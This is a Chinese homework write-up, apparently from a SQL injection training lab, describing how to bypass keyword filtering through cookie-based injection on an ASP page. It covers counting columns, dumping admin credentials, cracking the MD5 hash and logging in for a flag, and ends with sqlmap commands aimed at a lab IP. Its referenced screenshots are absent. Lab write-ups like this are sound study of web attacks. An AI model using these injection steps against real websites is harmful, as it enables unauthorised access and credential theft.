第二章：遇到阻难！绕过WAF过滤！【配套课时：SQL注入攻击原理 实战演练】【甩甩作业】

一、手工

找一个在数据库中存放内容的链接（即点击链接为查询数据库的操作），在变量动态id后加     and 1=1  ,弹出对话框，说明对

传参进行了and update delete insert mid master等字符的过滤。

利用cookie提交，会出现一个弹框，点确认

返回刚刚的页面，把ID删除后一样能正常显示。说明服务器能接收cookie传的id参数。

我们输入能正常显示，

不能正常显示如下图：

现在利用二分法，判断字段，

直到出现错误，如下图，

说明有10个字段，下面猜表，我们按一般思路表可能是admin；

可以看到显示内容为23789，说明可以把23789换成我们要查询的数据。我们把7和8换成要查询

的password和username

显示出了用户名和密码（密码为CMD5加密的），再去CMD5网站上解密

查出密码为welcome，猜测后台登录地址一般为..../admin，

输入用户名和密码，登录后台拿到flag

二、sqlmap

sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --table --level 2

sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --columns -T admin --level 2

sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --dump -T admin -C "username,password" --level 2

也得到了用户名和密码